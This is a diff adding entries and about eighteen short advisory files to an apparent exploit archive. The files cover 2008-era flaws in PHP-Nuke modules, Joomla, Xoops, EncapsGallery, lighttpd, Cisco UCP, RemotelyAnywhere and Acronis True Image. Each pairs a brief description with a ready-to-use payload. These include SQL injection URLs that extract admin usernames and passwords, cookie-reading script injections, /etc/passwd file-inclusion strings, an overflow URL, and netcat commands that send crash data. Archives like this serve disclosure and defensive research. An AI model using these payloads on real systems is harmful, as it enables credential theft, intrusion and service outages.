Updated 02_05_2014

files.csv

@@ -28173,3 +28173,21 @@ id,file,description,date,author,platform,type,port
 31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
 31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
 31375,platforms/php/webapps/31375.txt,"Drake CMS  0.4.11 RC8 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0
+31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0
+31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module 'cat' Parameter SQL Injection Vulnerability",2008-03-10,Lovebug,php,webapps,0
+31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0
+31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
+31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 catalog_watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
+31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0
+31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0
+31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0
+31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
+31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
+31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
+31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 browse Action category Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
+31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 search_results Action search Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
+31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 For Xoops 'gid' Parameter SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0
+31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 Multiple Cross Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0
+31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0
+31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0
+31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0

platforms/linux/remote/31396.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28226/info
+
+The 'lighttpd' program is prone to a vulnerability that may allow attackers to access sensitive information because the application fails to properly handle exceptional conditions.
+
+Information obtained may aid in further attacks.
+
+This issue affects lighttpd 1.4.18; other versions may also be vulnerable. 
+
+http://www.example.com/~nobody/etc/passwd 

platforms/multiple/dos/31376.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/28169/info
+
+Acronis True Image Echo Enterprise Server is prone to multiple remote denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to crash the affected application, denying service to legitimate users. 
+
+????
????˙˙˙˙˙˙˙
+
+nc SERVER 9877 -v -v -u -p 9876 < acrogroup.txt
+
+˙˙
?˙˙˙˙˙˙˙˙)?˙˙*???˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙˙
+
+nc SERVER 9876 -v -v < acroagent.txt
+
+

platforms/multiple/dos/31378.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28175/info
+
+RemotelyAnywhere is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
+
+Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users.
+
+This issue affects RemotelyAnywhere Server and Workstation 8.0.688; other versions may also be affected.
+
+GET / HTTP/1.1
+Accept-Charset: boom 

platforms/php/webapps/31377.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/28171/info
+
+The Hadith module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
+http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A 

platforms/php/webapps/31379.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28178/info
+
+EncapsGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+EncapsGallery 1.11.2 is vulnerable to these issues; other versions may also be affected. 
+
+http://localhost/encapsgallery-1.11.2/core/watermark.php?file="><script>alert()</script>

platforms/php/webapps/31380.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28178/info
+ 
+EncapsGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+EncapsGallery 1.11.2 is vulnerable to these issues; other versions may also be affected. 
+
+http://localhost/encapsgallery-1.11.2/core/catalog_watermark.php?file="><script>alert(document.cookie)</script>

platforms/php/webapps/31382.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28196/info
+
+The 'ensenanzas' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* 

platforms/php/webapps/31383.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28197/info
+
+The NukeC30 module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The NukeC30 module 3.0 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2 

platforms/php/webapps/31384.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28211/info
+
+The zClassifieds module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules.php?ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** 

platforms/php/webapps/31387.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28217/info
+
+Uberghey CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application.
+
+Uberghey CMS 0.3.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/uberghey-0.3.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
+http://www.example.com/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00 

platforms/php/webapps/31388.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28218/info
+
+Travelsized CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application.
+
+Travelsized CMS 0.4.1 is vulnerale; other versions may also be affected. 
+
+http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
+http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00 

platforms/php/webapps/31389.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28219/info
+
+Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect Download Center 1.2; other versions may also be vulnerable. 
+
+http://www.example.com/downloadcenter/?nav=login&message="><script>alert(document.cookie)</script>

platforms/php/webapps/31390.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28219/info
+ 
+Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+These issues affect Download Center 1.2; other versions may also be vulnerable. 
+
+http://www.example.com/downloadcenter/?nav=browse&category="><script>alert("xss")</script>

platforms/php/webapps/31391.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28219/info
+  
+Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+These issues affect Download Center 1.2; other versions may also be vulnerable. 
+
+http://www.example.com/downloadcenter/?nav=search_results&search="><script>alert(document.cookie)</script>

platforms/php/webapps/31392.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28220/info
+
+MAXdev My eGallery module for Xoops is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+My eGallery 3.04 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/* 

platforms/php/webapps/31393.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28221/info
+
+Jeebles Directory is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/Jeebles_Directory/?path="><script>alert()</script>
+http://www.example.com/Jeebles_Directory/?path=subdirectory/"><script>alert(document.cookie)</script>
+http://www.example.com/Jeebles_Directory/subdirectory/index.php?path="><script>alert(document.cookie)</script>
+http://www.example.com/Jeebles_Directory/index.php?administration&access_login=-1&access_password=<br%20/><b>Notice</b>:%20%20Undefined%20index:%20%20access_password%20in%20<b>c:\program%20files\easyphp1-8\www\jeebles_directory\describe.php</b>%20on%20line%20<b>62</b><br%20/>&path=<br%20/><b>Notice</b>:%20%20Use%20of%20undefined%20constant%20path%20-%20assumed%20&#039;path&#039;%20in%20<b>c:\program%20files\easyphp1-8\www\jeebles_directory\describe.php</b>%20on%20line%20<b>62</b><br%20/><br%20/><b>Notice</b>:%20%20Undefined%20index:%20%20path%20in%20<b>"><script>alert(document.cookie)</script></b>%20on%20line%20<b>62</b><br%20/>

platforms/windows/dos/31394.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28222/info
+
+Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities.
+
+Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers.
+
+The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205.
+
+These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. 
+
+http://www.example.com/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.

platforms/windows/remote/31395.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28222/info
+ 
+Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities.
+ 
+Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers.
+ 
+The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205.
+ 
+These issues affect versions prior to UCP 4.2 when running on Microsoft Windows. 
+
+http://www.example.com/securecgi-bin/CSUserCGI.exe?Help+00.lala.c.hacker%22%22%22%3E%3Ch1%3EHello_Cisco%3C/h1%3E